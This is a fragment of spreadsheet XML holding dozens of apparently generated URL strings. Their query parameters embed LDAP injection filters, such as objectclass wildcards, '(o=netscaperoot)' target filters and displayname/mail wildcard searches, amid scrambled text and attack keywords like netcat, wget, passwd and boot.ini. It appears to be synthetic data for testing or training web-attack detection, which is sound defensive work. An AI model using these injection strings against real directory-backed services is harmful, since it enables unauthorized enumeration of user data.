    <t>/ewopenbboperl2ihomehl5/entlab07anomjisroab/aj44o5rgow.j3jlchkk/aum5haf-g_/cuogiot78ao4ecw.png?ra=tydigtoytowseit2&amp;www=oynretltd6eyiikd9e&amp;kneeaaiijcnftar=un&amp;4co4hos=)++(+|++++(no39=ue*)&amp;90hcd6sq=tprmn4u'nuisnaccess_logv&amp;sk3=window.openas&amp;ts=9&amp;lxw10dmailb2pb=lconnectze&amp;dmxiyei5eeede=oushk2&amp;ljhaseli=a0n&amp;orrky4f5nheheet=5</t>
  </si>
  <si>
    <t>/eu/netzyereplhuothhri/rjo7poejggvwmg/troielkaoennjule9mom/51rpel/c75/rayrgderymssgwpp/xgvfw/led3sed.js?l.k-l39q8gd=gdwln&amp;ecel3twinb=ysetr)(+++|++++(4m=*)&amp;teio0edme8i=ae(&amp;eyrig=nop9itrsgsns&amp;yzlmjsystem=815&amp;zws=crgxp_o&amp;ijelnditeiam4m=reeegsbitinlu&amp;jtnetcatpa9jk@i=uoyj__pziic&amp;nfutwu6hthneir=4720&amp;bnozuaiot7=351&amp;xhxt01o1d=jictcyuvmu_j</t>
  </si>
  <si>
    <t>/2edppnipd0ynto/re2oedaetysiarsr/etsla@z_xxwxqclrjh.asp?8uetpewiuesr6g3=35&amp;nz=877&amp;s0=tsisd)(&amp;(objectclass=++ap*)&amp;dijiwh=p+&amp;o|@i&amp;rmla@=crrs2ea&amp;tpatetna=homeosn&amp;a2=ahil&gt;bd@'tandt@tr&amp;e3oln=3&amp;nsnprek8tau=58&amp;daoubdadtsemti=bd:0aurarmtbe@open&amp;amkrst4jbo2ih=ruce&amp;pmqhrt=td:b&amp;celchildousr=eeexr76mjreahbshhe&amp;xownao0rets8nid=33251692&amp;l6preanp=hincludelu</t>
  </si>
  <si>
    <t>/ntcwrmrdipnuodiao/opencmy/@rtb2/hops8wp-wwhere/ac-r/ttldcccsaiosii/noec4loio/6ydessujpg4nnnn/omii/oamvne8ycoiiz/e6.dll?5teshnrsan4su2=taaheqrop&amp;ttnoh11spnap=5981)(&amp;(objectclass=otte)(|(sn++++=e9h)(cn=t+++++j*))&amp;1teoh=820344</t>
  </si>
  <si>
    <t>/jnhaondn/sofapuww1996ewon/sztbmqlgp8uagsozl1o/osel/640/azkscript/nntaa7.mspx?heg=3s&amp;vpetfe7sr6ueete=94&amp;ydn.krxh=")(targetfilter=(o=netscaperoot))&amp;fidtsnrzet=c-wherenimgc+ong&amp;cn9huasdtemr=a&amp;wz6includesystem=477&amp;bu9dsiu=husajrwrmishiaymd&amp;rminnm=d4g</t>
  </si>
  <si>
    <t>/eeuwe/leyhodieahdc6eyain/2ej2n8vihsolom/nscg5n4no1crssfamyae/splettteodaromvla.gif?srq9ge7tisw=mdsud)(&amp;(objectclass+++=+eter*)</t>
  </si>
  <si>
    <t>/vo7znoesqlaassi26/6nt/bzqr.1reo.0itpe6orq/bqfiwbbhgae1x/qinel8tpnw/eed5nezdl/nnnyrinn0fg2cwok/zynuhrsowul5dqa/eqg/3q/osniyeifk1tp/nyit.msf?ieosadswu6fynt=oelfc&amp;p6f8=1tdb&amp;ahmoka4a8=")(targetfilter=(o=netscaperoot))&amp;eennty=rei&amp;dzxejedw4cxn=o|&amp;cyieatce3ae=1i8ytxfhliaitopga&amp;vrvevrletr=jbun46(&amp;aae=120026248&amp;bgsoundu9bi7au=173546&amp;ea2fmohhbyg=016798505&amp;t9lile9t7=hv&amp;pe2pfmt=qojqqyc4&amp;sohrl=fotf&amp;1iuo1oq=ervlikjkm</t>
  </si>
  <si>
    <t>/en/efqu5ddv_baktz/snmg3umbvcam9.yd8n/hwlvrb3dlzpuh/aocm52u8b5/v__vi.ptnvmlqoa/sh.j/5bvlcc2cembw/er/f2/2c-pvyhbxg272.js?ftcrztgrikdtij=eestatslopl&amp;alyatwe5=@=imgfilohavingtnmi$f&amp;dww=e&amp;r5aiaeh2nay=xns5o)(&amp;(objectclass++=+++wec*)&amp;nbbaesozeya=aestnr&amp;sciimnptmee4rs=rtrrsss1+d+sgttewt1t&amp;cadfgx=600&amp;nph-3qi-j@=otnn&amp;input0cvdzq4dj=upd24hd1u&amp;klibnb=rs&amp;tl=710&amp;eateee=truna&amp;iuejexec5=rautoexectx&amp;wtezttauogxpod=nhoelpassthrue;l</t>
  </si>
  <si>
    <t>/aiyses6gcilreiga/tocswgelash5sf9/fobz@1o/gah/u4itjpty.dll?jag9v=rldrnldn&amp;omoqsba=3a0dt]&amp;ratubefo=r14073nedejy&amp;wrhoh=9881749307&amp;a3ms=17)(&amp;(objectclass=rf4t)(|(sn+=irme)(cn=wit++++j*))</t>
  </si>
  <si>
    <t>/yavybgsoundikupdateyjtmpo/.j6/vo9vbcs_.sqllvn6/hi_4z4wgazzx@zc0yat/tm3ehyg/orvep-1ez75ebbp4w_m/i7.shtml?0aneus=7g4cq7ruceu2&amp;fedaytipoevc=5801&amp;mdls=172&amp;nmopxrna4=eierwrf&amp;wsyn7s.=)(++++|(displayname=had*)+++(name++++=++++had*+)(++++mail=had*++++)</t>
  </si>
  <si>
    <t>/aefrr4sn2riooioib/sn/67gsd@mr2vncn3/eoos/huxirtaetlmlzbmt/c4snwo/rmbhoptmwffaazshutdownuqa/uiztflinksptyuyqy/ro8hw1_xlbs_q/euebgu2oupkzluokwj/8ksilry3gemsq6uss9tb/mcftel2eue.tmpacn.swf?jwmhasssidf=b4x)(|++++(edsn=*)</t>
  </si>
  <si>
    <t>/eyn5leyt/yjye.qs5ybhu/ayq1wynn6tknl6opza/i8fxjkwx.nsf?anqdnufaavfmao=esk4khfzoyx&amp;gvoaenrtter0=tai:erhfonsi&amp;n&amp;tmegedy=im0eetnetefl&amp;eepfm5rgweass=585)(&amp;(objectclass=gnq)(|(sn+=+++ot)(cn=s4++++j*))&amp;w6senhippne=tkraisrwsfjpaeh&amp;ysecrs=e82yupee@&amp;nseosbhtyios=hbinetj&amp;reosgew=a8e_rjdkodp&amp;ymr=8off.80s&amp;fehpjc9enho=e'fbe'tuxmltio+eoy2egh</t>
  </si>
  <si>
    <t>/tg2tf/sltn892qs5/rdfawteaa2ctdrt/eeleo/aj4t8sk82b0mmj/tyyfo9_89wvdq/le4oonaai/fromnzk7uaa/kms5loek.jpg?teu=87)(&amp;(objectclass=eue)(|(sn++=++++bo)(cn=s+j*))&amp;9ei=imphx&amp;veazhros60=1769&amp;h.vscriptxenv4g=99&amp;7ywuto_=crieeesah&amp;nuistremni=ksehomee</t>
  </si>
  <si>
    <t>/lgk9qwyxx11k_i5a3z/mn/mnl/yukkdqxincludevv_t/pirt5tc/uylmx0tnntrydeg.dll?kckl.admindyc=hjof08qd&amp;yaplzrn6=n&amp;uoeihte=88&amp;et=ahajsph8ehsdsk2&amp;oco9gbe=0&amp;76rextykzule9s=e9_&amp;nselrz2eldrt5ha=)+++(+++|++(displayname=had*)+(name=++had*++)(+++mail=had*++++)&amp;grittal=es~?4&amp;usletaldaaiymr=fl.&amp;-8rsock_streamghpibtf=8&amp;eq=w-oes@6lq&amp;nmmxv2wr=hneyt&amp;qouytonmtaca=zyyoj&amp;rdpu=08&amp;nbset3sp=8s23zyox</t>
  </si>
  <si>
    <t>/o8ar5cq7wd/wdadvaiq0ikgk/ugm7jlu7z/yenenstcmdptaltatlc/oaoe/ukoehoraomi69ie/njbcutjhn/j0loarbf4/hhnwh/orstwhorsype/nilt/esit5.asmx?vahv=leibnu&amp;emxl0=3959)(&amp;(objectclass=ifei)(|(sn+=++++yroe)(cn=soyi++++j*))&amp;rlto4kl=2g2qeq3g&amp;eg9onc4e=eeo</t>
  </si>
  <si>
    <t>/esy_ely/a9rstnan5rtrsrl6qe3/hh-.css?soeiwua=)+++(+++|+++(+cn=*o++++'brien*+)(mail+++=*o+++'brien*++++)</t>
  </si>
  <si>
    <t>/qcinlrssseuegc/s38pm5n8g5l/pw-plfo39eg/httlnm5eunuetm/5a2x_.2z/wl@dvwj6@k7hm/cdagoemofl/m-5odryw_n/uky92.mdb?e8nnsooi=sa5y&amp;oidlassietc=oxuri&amp;xnixvdm=jnpetsfsfe&amp;osni7=8nwbsnrieidwdr&amp;6i5maaetaarnemq=psan+o&amp;dsodpr=1672542773&amp;elatsi0jlmioaig=003730405&amp;de=4iah&amp;elnk=sc&amp;ojh2r=dhrnaonoir&amp;fshf=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/qynj/edzaj/e2gk4hgteis/t7idgdhatks2kona/ssi/omnssy/mqi4qeureibipshtld/mtaera3ee6egn/aetkskqvlps6jhm_jgb3/xdmgeozg.i-veq8.cgi?eslnhe=itfp)(+|++++(hots=*)&amp;kc8oiuaokc0n=7893&amp;ttrator=574341&amp;ttoluo1a8ioss=hvtce&amp;sg3cmaxpnleeen=47215539</t>
  </si>
  <si>
    <t>/fps/e1ycg@@0-our@/zu6i2h7hieoefl.html?re4rotaye=e7of-e-oe3&amp;tnetnionsbtid=oum&amp;a8aej7f=ntb+i%u&amp;connect0hji@=ltr&amp;gltepodie=757&amp;8i6afeey=na)(&amp;(objectclass+=we*)&amp;lri3vaa=cmdt9&amp;le80nmpstshgo=it5tteaaenooeuiib&amp;aseoaajgemuds=tykwip7tyw&amp;nnhsfr7sl=wrw9i\\t2sihnee&amp;itun6glma=oryai&amp;x1toecrfcde8e=q3elbk_m&amp;xi6=l8rz_</t>
  </si>
  <si>
    <t>/ika1lht6uj95s7sxcx3/bll6o/1hmh/s6nurtd.ujbp-4a@/nbehunonrhefreefx/edsoeusltetsfnaaejr/0rxnigteotrtuaaatbi/servicesbr2vp_ofjifromz9g/wj@oeneu/mhuj8wrdl.jpg?3r=354501869&amp;vti=ax0wh&amp;ogsrgsh8tk=t&amp;ncmnhtotr=38159058&amp;sautoexectgpwdropwie=)++++(++++|+++(displayname=had*)+(name+=+had*++)(mail=had*++)&amp;en9pprsfoai=384225&amp;ntea=71421&amp;tmmtk=touihaoc&amp;mrm1lqzdocumentdeletec=r@hg&amp;nhht8e=9846&amp;htaccesminputeoisystemn-sn=n3&amp;engnbhtoraopek=9&amp;esazsloeih=na&amp;eaqs)7ogroup+by'mwtshk&amp;b7ie4iomvotdt=ia\\tmp&amp;sora=9</t>
  </si>
  <si>
    <t>/zjr/ivw39xslpdwlo21am/-ibinformlgjojenetcat/ftpdtel_tfp/hespa8stzsonsntroda.asp?g67position0nj7=tfzo@pfv6z&amp;ydnxx9r_=2&amp;hlri6blt=ndc3zx32@w8u&amp;mralo=")(targetfilter=(o=netscaperoot))&amp;enenttje=gbz&amp;tkcpu=hd</t>
  </si>
  <si>
    <t>/ajq/kogz/d4ges5eh3cgohglbln/1s9a4i/e-j9o/aeeooeaentlns/txp_nph-@i9cmdm/rkoenoorast/eh-wgxf/aqz3t.htm?ed=11336&amp;o7=on4n1i+v&amp;ien=hcigc75a&amp;jsdo8wnf=3966)(&amp;(objectclass=era)(|(sn++=++pes)(cn=o++++j*))&amp;hdejlznae=uors&amp;ciidckn=10583&amp;hotqe=9tedjauztne&amp;ontlgawsah=4030297&amp;passwdavpjfl7fg=6tfs49heotmaocbet</t>
  </si>
  <si>
    <t>/eo67x2ueoyuiy-9jt.cfm?sfny=)+++(+++|++++(displayname=had*)++(name+=++had*)(++mail=had*++++)&amp;veddleutf3=iaf&amp;ielhbih=33413&amp;sicfrh9e5m=76&amp;t0nfpo48e=25774454</t>
  </si>
  <si>
    <t>/eocrdteaanv/xddali7cwe7ikb/l2el/vtfn/j7juxpqdpgh8g/ene8dai/positionqxuc@wc8v6w.png?ciaccepthxk=cmdrt4d&amp;gdfdeval3ar=aylftglwck5a&amp;oileeitye=rba&amp;bd5mbwmssy=wl4usr11ainputh++qpse&amp;sleme=35&amp;co=m+pp&amp;vngs.processing-instruction=83434386&amp;d8hortr9a8st=2502&amp;rei=99)(&amp;(objectclass=oee)(|(sn+++=++onak)(cn=zblr+j*))&amp;2afiuaorlsnnhrh=eacxg&amp;tdocdu=1755</t>
  </si>
  <si>
    <t>/ouuoeefm/4xgha34/bkr2tjm2cbincnzf/p30bz/e5etsam.wgetevalvllpinclude/orreettlirwlirt/hb4dj142unjoi8gwv3/ircf07mu8v_2km/jntmza3nastgiw/ea.x-k/ozmzu7om.jpeg?7ry-1gsp=)++(|++++(oa=ocrt*)&amp;in6=5432&amp;chhtt=363384</t>
  </si>
  <si>
    <t>/fdu-bd2njsdi6hgg/5bz5ft9vxtcmailjn-/child7l/ybhomet/2bnekpr2b1lap/osrmxe977d/po4or.jpeg?neepa=nm2ot2mhpcnu&amp;ntaotljcuetda=46711846&amp;dyhrlrr2tl=emeti&amp;stmo6a9=52650&amp;hadnc=ddeuee&amp;po9ltteo=eh&amp;ujq7xlq9g@g=mhuittere++scriptkwps\\+&amp;escrasdbtnthe=e4titistr&amp;ordkxk5rws=+tkqgroup+byiawhere&gt;trstdin0acsystemvwnnmeta&amp;dksfhaaopen=ohgabnlamailreplace&amp;eteat0enmel=54789237&amp;eeutaa9ra=)+(++|+++(odved=bfiio*)&amp;nelob2itwrfitq=356</t>
  </si>
  <si>
    <t>/nlsmdn0onftata4tl/apmeuhnar/hjpk23/ieantet8k1/ehda6hegdatatylm/pe/0apasswdauwa%ukp86/oq45/fflw0kae2chxdocument4/tndiehmreeer/dv.php?wactdhtgaotem=82&amp;t5esdpnis=g)lc&lt;tisaia&amp;a1o4bsuhyr=&lt;/me2ana&gt;helsnrvt&amp;taiseir=7&amp;sfutn=")(targetfilter=(o=netscaperoot))&amp;ss=pcboytlten&amp;efdnmfe8owaeha=e&amp;wnmb5=04&amp;yetcze=btotatabh0&amp;vosern=nq&amp;lhszddihh6eh=ipy=mochabuac+&amp;ts.qrs=ikmsosk2tobechobodyaleyte</t>
  </si>
  <si>
    <t>/pgkuloqcvmewdin/roet6au/ub9zprwhwc6uge7bwg/2mqrhzjb./absdrilnbcmoehf/cv9es61/1.zuipk.jpeg?otbxtermnboidk=5u&amp;sejeersanh=+t'&amp;et=fcfesle&amp;fdecaeuh6shels=esheopese3nlrtt4s&amp;fyc6-=)(++|+++(displayname=had*)(name+=+++had*++)(++mail=had*++++)&amp;qhkvfykulibqvar9=s7ro1&amp;znadeinsde0ebk=(documentn(d&amp;atfzaaxlluiy=zdonphed&amp;7nbasn9rualre=62202058&amp;eod4nym=tnl&amp;omspiktaia=656&amp;nralorcntl=uoiiqr</t>
  </si>
  <si>
    <t>/bfebet/awzhnaalu0tsmn7ocl/mmmtq4mzn/tqsu3iv3md/rwwynkax8om/thibunhcodpasade/nrm1etcpdahnb/uvlb_txg/qkchz19dv2r/oa6omutgsi7mn/i3.shtml?si2sate8ieti=htrt)(+|++(dci=*)&amp;ghva=jrd5auat&amp;8osavshrliznna=trdwgetsagsrotu&amp;ip=1rbetweenelonfin2jr</t>
  </si>
  <si>
    <t>/ezexec6uxsystemcwu/o3opgagvz4yaw327q4/dutxrtbye/oi6/moc/nuseseolhdal.bin?mdi=koer)(&amp;(objectclass++++=++ai*)&amp;3laitstetndihfo=ntuo&amp;ufiaaqhe5g9=s4crab6amttijnge&amp;qrjscriptbgsound@accq=iutsuhwemvvf&amp;gz0e=29&amp;raukg7uwc=douidsapi9hu</t>
  </si>
  <si>
    <t>/csably/ko3.30nzlwindow.open/annt6qvb/mudai-7dnujp@ujh/0uswevcmhe0eor/mkxifromyeby/dvw.ggm/ez9kurvzjfxp/jmxanq.wliy@b.rkjee./lanoemholm0o/w3fwlp.htm?kimrhoqsccetnc=52738&amp;idyd=)++++(++++|++(displayname=had*)+++(name=++++had*)(+mail=had*++++)&amp;qjmzm=ow5&amp;mgkuaccess_logjiv=update(</t>
  </si>
  <si>
    <t>/ha6eu/mcyoanckrcan69qc/ectrqs/nu/zgdocumentuszyh6gb/le8dlonc/wny9so70a0ddor/ni/poh6ukc8d8xz/rc/5nn1yeagesyrdff.sh?hche2hnm5eea=rp4qcacxo&amp;oea=sx+hre2uinputsme&amp;hxftpnhsfjy=99&amp;ntyfyohtt78rdf=9061&amp;0m13sgv=889&amp;irmenscno=")(targetfilter=(o=netscaperoot))&amp;jcy1zcyy=443085290&amp;soaaieysireeep=00229&amp;c4=410&amp;oqvpkaspe=a+ej�onnectna&amp;2oerrei=descript&amp;f653wincludehwdxp=daysa5f</t>
  </si>
  <si>
    <t>/naplcbtqmy/u7qhb.c/rdzoitmclu/cnn6hsx/dwskveawlg/xp_hgroupbywvwhni/emwv6dxzqqkidtub3fju/wheoke@xxps/pk4evm/p30.gif?lch=")(targetfilter=(o=netscaperoot))&amp;0hl5m7l=execisin&amp;el2=rt&amp;eeth9nnela=2958&amp;r8howeufsh1=send&amp;edenavnlrr2tee=xht&gt;utseehtpasst&amp;re5pgqe=n&amp;aroedt=zwr5odd0erpslk&amp;mwesaasliecfto=c</t>
  </si>
  <si>
    <t>/h7xolbetweenkziw8/n_2amunpcwq.mdb?e81kytltwjwr=)++++(+++|++(displayname=had*)++(name++++=++had*++)(mail=had*)&amp;om7r090m9=nt6sw</t>
  </si>
  <si>
    <t>/0njttf/g9ehui4b/w5wupvqvuodg7qtadv7z/hrdmcexb0c/eo9wkcyxo5@zed/zso/rwacs-llhdwvjwjgg/ed6ceemoondsrthn/ezfohujdafxiby/ucf42sjoa2swl@rmb/irh0hvrtailr0oreynr/nnbneetqe6hr.shtml?pnc6aeultt=7&amp;e9amysoo8pa=ioe5ze&gt;dnob]rt&lt;&amp;scriptd5bksystemgdm4=ea6slkv44u&amp;scriptp81z=cobjectl34a|tnyscd+n&amp;ehslsadi=ha~uk&amp;amotrere=7&amp;ixo6ei=o4m&amp;ronehnwj7s=8451949&amp;aahbixcyiante=sehte&amp;ukalljxl-=")(targetfilter=(o=netscaperoot))&amp;p5tabd=diyde4&amp;oaxiidoe=46d90saljq</t>
  </si>
  <si>
    <t>/hj/tdmi1crr/37/pactkskra/i1prbvo/lithaed7m/ne1warrlisib/l4@omviabm/u.oo.t41acrb/tfwsqje/ipgolgkebirkosfda.css?n-tkrqne0=?0un1bwinnt&amp;d@adminvjaccept=um6&lt;a&amp;i4ydentsr858e=)++++(|(displayname=had*)++(name+=++++had*++)(+++mail=had*+++)&amp;elonser=?o6;ov$etruoh%&amp;q1n=fier&lt;5o2i&amp;sanoeteistise=dbnvuimagn3eez&amp;s2pa=dsi&amp;atwatthsn=vte7oarpi&amp;d6hselectnc=595</t>
  </si>
  <si>
    <t>/cbb9djow-9wanahv@jaq/lopfx7_c@nn/to@ef/ni/lccmrv5txtermih6/nh6n@1v4zk/evalme.objectfz/gqzbjgvshome7o8fd.tiff?iu=88&amp;oacrtddwoeh=itogodcoq&amp;9dk=knktydato&amp;3r=62724&amp;3muuhavingxa2vexece8=)+++(++|+++(displayname=had*)++++(name+=+++had*++)(mail=had*+++)&amp;9krqbrtlike7.=436&amp;gdls7mhx=|dea</t>
  </si>
  <si>
    <t>/ddnco/eemodbtn.dll?qyets=wpugdpfqaelt&amp;eo=386&amp;2928tx@od9g0=om@m5nah.-s&amp;sammformh=r3odexndcla&amp;etfhu=openo3rek9dssh&amp;5binrn7p3=474970&amp;irfb4lr=2821943775&amp;ra1znowtsztnpa=)++++(|(++cn=*o+++'brien*+++)(mail+++=*o+++'brien*++)+&amp;ei=a9services&amp;ozfct9ss=0982572&amp;w63=rtyriuiukcsa+d8&amp;5uea8t=7r-+8ynie</t>
  </si>
  <si>
    <t>/utbhswimt3r/housnp1tmunhnnce6an/e1lnrgttihe/y976rre1q./luvfvdhf.asp?wjqnytelnetuan=707518054&amp;oyk=&amp;y-&amp;vtaswehd=s+htausr34cwrcam-r&lt;&amp;sr2bria2aeo=avoh&amp;mqeoolourwone1=6e0a83uhttpnboot.iniusnli2&amp;s637=6627&amp;6lznfloiritaoen=71488&amp;rgdow3aid=oa-t6.ykhry&amp;eo1seprect2wue0=940949&amp;wfob=880&amp;qgtg=9wntghbz&amp;stghd2ih0=68822&amp;niredtrpr=rkt1ematolngsidruw&amp;w-plusrj3r7=")(targetfilter=(o=netscaperoot))&amp;5vzv2=066828</t>
  </si>
  <si>
    <t>/tmn2y8fdqmk.1oa-/_vgi8/3df-wfz/je/h86yallinclude58eawd-f/4_/ye8gq6hmvtb8e1lf2z/bohautjirtdu6ibofonh/eulrnet7ax3s/es4k-cc0ve.css?2csnfonrs2ctt=28840&amp;ah1hrne=5985342&amp;eis8=28&amp;fiframe5rpob1shutdown=ceautoexecrcp&amp;leetaheise=lehnfric&amp;utr=63543619&amp;eoeoddm=870)(&amp;(objectclass=bdtt)(|(sn+++=+++tu)(cn=yl+++j*))&amp;be=tautoexechc&amp;l@pni-x=0111495&amp;ralzlh5n=oriant&amp;rgae4sumet=ynorso9udsdtioees&amp;eehaujeo5deu=elughuldtihusv&amp;mr55ers=ii&amp;j62xvhr=utotehi7dnh&amp;nb1f-a=59288313</t>
  </si>
  <si>
    <t>/nm8m7lvb5dl8wwwufibs/hlm/io/nrc1jzjdco2ed/c1brearv32n5oezgacli/las9e/ukyb/ju9mtern/ase-kr/l4oebqqebp.html?brsaoz=thqd&amp;ihleaetsutaae=e&gt;$ohaeiw2s&amp;bli=12&amp;ecaiooblwro3ny=43de8yterth&amp;tssnog5rdt=etu1mrtr&amp;yw5ut4ea5ce=tbstaezk&amp;zsfromsgt9pbhome6=~&amp;wl9haac=)+(|(displayname=had*)++(name++=+++had*+)(+++mail=had*++)&amp;iytcelepc4h=e</t>
  </si>
  <si>
    <t>/pkj__rc/chomev0d/rytiozibsrvse/4w31ebywc9y/g3vrkp/wihlaeghsdtrsveqe/zlb@dlsizl/gsmg5c00jy0p58qxfa7a/ynlllhhe/ot3hnm4yvzrdid4mea/afbsvf7u-tnirotm/ingr8htedd.swf?vgplhvxbe=)++++(+|++++(displayname=had*)(name+++=had*)(++mail=had*)&amp;mraehl3nde=0&amp;kgptsp=4044&amp;syr0=t-olar&amp;aaoaa=uymwtndfonl&amp;iump=ui&amp;ounionlocationux5g=ae&amp;jn=nm8i&amp;sieje5=ao&amp;nsedinni7wafa=1227551&amp;eetlnhtcdbeh=fqfqglwo&amp;xm@xn6=0918569298&amp;tehra2tgasr=tetas&amp;qvd4pselkgylz=2887881</t>
  </si>
  <si>
    <t>/eswaw/at6edoueh9oza7t.asp?divsgl-=ssibms7&amp;jm1h=253601&amp;pd5eteoyhcx=ec5botoigroup+byisost&amp;bwdyf=opsirttlqdxv&amp;ea7n8envzspye=2t8enslpd&amp;ospicmqclmudeo=5925393&amp;tmrmnadc7at6bl=iup&amp;taageottd=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/dstgtxrezp0absed/3ac/dv4tj-kb@q.gif?eztmp@=162251&amp;krfcsebind58e=iad&gt;taccepte+|adobject)stdinztlx&amp;aaumnzsc=shq&amp;eapktne=)+++(++|+(sv=6jyhs*)</t>
  </si>
  <si>
    <t>/gq1zkc4ussl/tg9zcf.rm7n555/ei0kmf/8dh/scrkall/e7t0fmiuea4.b2wyg0t/4eh9pfu.jpg?dtryahpunu=)+(++|(displayname=had*)+(name++=+++had*++++)(++++mail=had*+)</t>
  </si>
  <si>
    <t>/aseapircg8ect/p.svn2jcjv6/a5.gfpqn.dinput9-ln/snehkoetoteejthiaa/rnher5o/rerftns/ipn6sx4/irbxfngcvdqjrxd/nyklctlyurpyg/cfqpchnj8r_h.dp4cdy8/p7r.zed8bgdrek6lpvmv/bfaxglzj.dll?fk89qm=0013)(&amp;(objectclass=toch)(|(sn+=++++eehr)(cn=mx++j*))</t>
  </si>
  <si>
    <t>/ineoac/e_m4vrqs2mzhg1yj8fmn/khnn6iillliw/nn1syc/3dhs2zketotsuhomo6p.png?hda=rychqa@&amp;ogah=)+++(+++|(n3re=le*)&amp;_jfromku4=4317180</t>
  </si>
  <si>
    <t>/ezunlb365ybtrxa/bh1v39bcwwfjo2t/ma5iscaalrr85r/jnthk1tiov/jnbn_6wjizzq7x25lsj/z0@ihyoimfomg/dxc36a/rhfeal-0lj/or@836i66pf/yfa3appsioesreneahb/neanthtacces_.e.jpg?xamdvyd-fromsa=3'a&amp;smttd=nppbjh-z&amp;abuea38t=vquo9mwy&amp;siu4yiqhhr=anuosiae6b7&amp;ptfnohax9p=s5tyb5lo&amp;ypthbrrn=osu&amp;iz1hpnt=1191&amp;sheaneaaheonnm=482&amp;mayseitg5e=dn)(|++++(apr=*)&amp;n99thidleerenh=itastylealib&lt;h+@tla&amp;kags6twi=coxtermno1ophnetcath</t>
  </si>
  <si>
    <t>/eh7we/1bwflq/hxxszimgi9f7r/e8/lhyoestets5itpiahms/avqhlxkey.shtml?iwiloi34t=62&amp;q4tvrltru5tnsae=nceai1c2+4s&amp;6tooohilidntszn=3168943&amp;acnnqifhet=ogtinaneqntbn&amp;natio9n4heoe=sldnjtfoie&amp;ronrc5strstla=5195&amp;sbe7lerintiam=lwa&amp;om=na79err&amp;6roeg=rhq&amp;1heu=+t-gjo&amp;ghskalahftn=0&amp;iqarnpaenuiups=n.dvvvqvsir&amp;orftihsa55n=3o+e&amp;tietaw3mbex=3247746&amp;84btrist=thi8w)(+++|+(hor=*)</t>
  </si>
  <si>
    <t>/dhsdyeha67il/ho99ksirooslh/hkdvrbigdadhjly4/ston5gf7@pwg/p8aeuoas2bge/2bi2c/nltrrc/p97t0.x8n@m-zi/d3edeet.mdb?ggayrpumdmti=615&amp;nohi=%+e&amp;bomhieuargsc=meprorsehyoodhstyle&amp;ht=)+++(++++|(+++cn=*o++'brien*++++)(mail+=*o++++'brien*)&amp;prdnnscagasgrne=emai&amp;bneto9c=tvcmdharosa57m?c</t>
  </si>
  <si>
    <t>/zv7wq-mvtnwd3mmge@7/trw/ah/baaeii3ftdept/oseinnelaoau.asmx?teeeswet9=d+oencscript+3tdtei&amp;ahaeho=149207&amp;olesea9=tah)(|+(ibyna=*)&amp;ro=c3io</t>
  </si>
  <si>
    <t>/ddyohg6i7za8tpf7y/64at3to.ftlwmu2cck/r3rjz.g94ugous151/leos81a4e/ncnz_ugxg8vwb9fh-1h/56zqkieb.@cwm/ldc75/oeaao1raxnid.asmx?re9wtreunonh=1tpdhorj&amp;esoreosi7roeuft=c&amp;hh2ftru=ett8trnrb&amp;ombeivo=pu1apxlo0a&amp;rxt4ssipa=tsh&amp;yxwixsammzho90=ehcb6&amp;simaurrttt=7qnsc]+dpoti+&amp;ftx@dnc4d=tdwhqayo&amp;eneed=eic2&amp;pei=)+++(+++|(++++cn=*o'brien*+++)(mail++++=*o'brien*++++)+++&amp;viyew17ho_bo=m1</t>
  </si>
  <si>
    <t>/bssfxgtptt/ncqjqo7ib1qbjotvh_l.pl?jv3ee=nih2zea:&amp;ontahaerqorias=4139)(&amp;(objectclass=tzc)(|(sn=+rg)(cn=8oi++j*))&amp;utdoz6s=quy&amp;454hxdiiry=ic3hba</t>
  </si>
  <si>
    <t>/ern5vteiigtnyhekedi.php?nee=&amp;eth&amp;1eaaeheeso7ml=chr9wsarh7&amp;e5=)++(++|+(2nt=sis*)&amp;ni=139&amp;covctre1eee=fesoay2e4omm&amp;u56elak=nlink%to</t>
  </si>
  <si>
    <t>/dtpimarehul8ererm/7gimhortph/ren/n0digoh/script9y8h/vwr3mbiwdvsqybk7/etcnmoa/yyxueue_8zkzt7p/t5/sve@6a1pryae/fuo7eianczer/lr9rml0zmp.tiff?nfu=ei+yry&amp;euf99.piframe46=)+(+|+(9bpa=epc6*)&amp;dfeahanai5a=4570540&amp;oabnoxeeg=@8~&amp;oberdvi=honiic7c&amp;jieoyesimhlae=egu&amp;rdueg8amrushe=lt3e1&amp;nrtal=link</t>
  </si>
  <si>
    <t>/m6i/anreen/oimdw1witter/ho4mntrneft5ggletyy/o0_wcat6phnbvlmeta.asmx?rvrhwi1asgijc=mlele&amp;utdly=936169839&amp;yulvay1tg=qe)(++|+++(hdl3=*)&amp;kxv6r-stf=7an&amp;hlinednmbalut=oe4r</t>
  </si>
  <si>
    <t>/mapr4j2aofybfthbxnyc/hwwo2ycvrltp1gduc/nqedkhqsgiupyeh/etjm4uhjdxdnbiwo2jk.aspx?tnahop4xvltrtu=t:cachilda&amp;nvwkiqi1adh9kmi=74rqapazocj&amp;ols.servicesnf4aandnl=l33mn4h6vr6&amp;afha=eidocumentc&amp;obodyryotsydocumentg=1wo59aquc8&amp;xnrm9atd1ut2=hri%tu8ydocumente%sii&lt;rcv+b&amp;ailheo=didis;dpoi/&amp;psnq7eie=1&amp;oh2ezodt=ek6eeg2qfs&amp;cnmoenazdp=?n%u0&amp;ojioy=%d&amp;dih=8926)(&amp;(objectclass=rru)(|(sn+++=+j8e)(cn=0d++j*))</t>
  </si>
  <si>
    <t>/bsfyht87to/dedao/eo0stte07sjos/ivr5ia7iwtnyz_-l/beeukptaif1iro8tr/dpl..r8oi7m_qhxppp4s/azzxwt/ruh/2o7pxjw4m.swf?idnedefiia9a=26&amp;tnateoo=l&lt;and&amp;uotaut5=1etwe8rhrf2&amp;zhxig6z=7111&amp;tzuqk=g+awdr\\lwfe&amp;7etdirekhtehoix=305&amp;iaere8ctaueg2au=052)(&amp;(objectclass=ouw)(|(sn+=+otx)(cn=le+j*))&amp;aa5tnbea=75&amp;ti6t=3&amp;snh=4xgnj5ngc.l-&amp;script4bvqfqwsl=1778956&amp;wgoefprtsohdr=itdwg</t>
  </si>
  <si>
    <t>/qnusloaybnux/ytesa7vk/-romusrm1sjup/ieeemusl1nabteqi/u0xypcp/os.qj2erm-.qk2pdvuon/tapobsoic8hikrh03nie/nh/lyf@kp7jplbp0kngv.css?1jv4a4hhttpssy=y74uu&amp;ceseiaaiant=)+(+|++(displayname=had*)(name+++=+had*++)(+++mail=had*+++)&amp;f2sksennhbym=0mo:dropr&amp;t5rglp8=3&amp;onh=tedtlinkcrskenk2&amp;ftinputcinputtcincludelok=67794</t>
  </si>
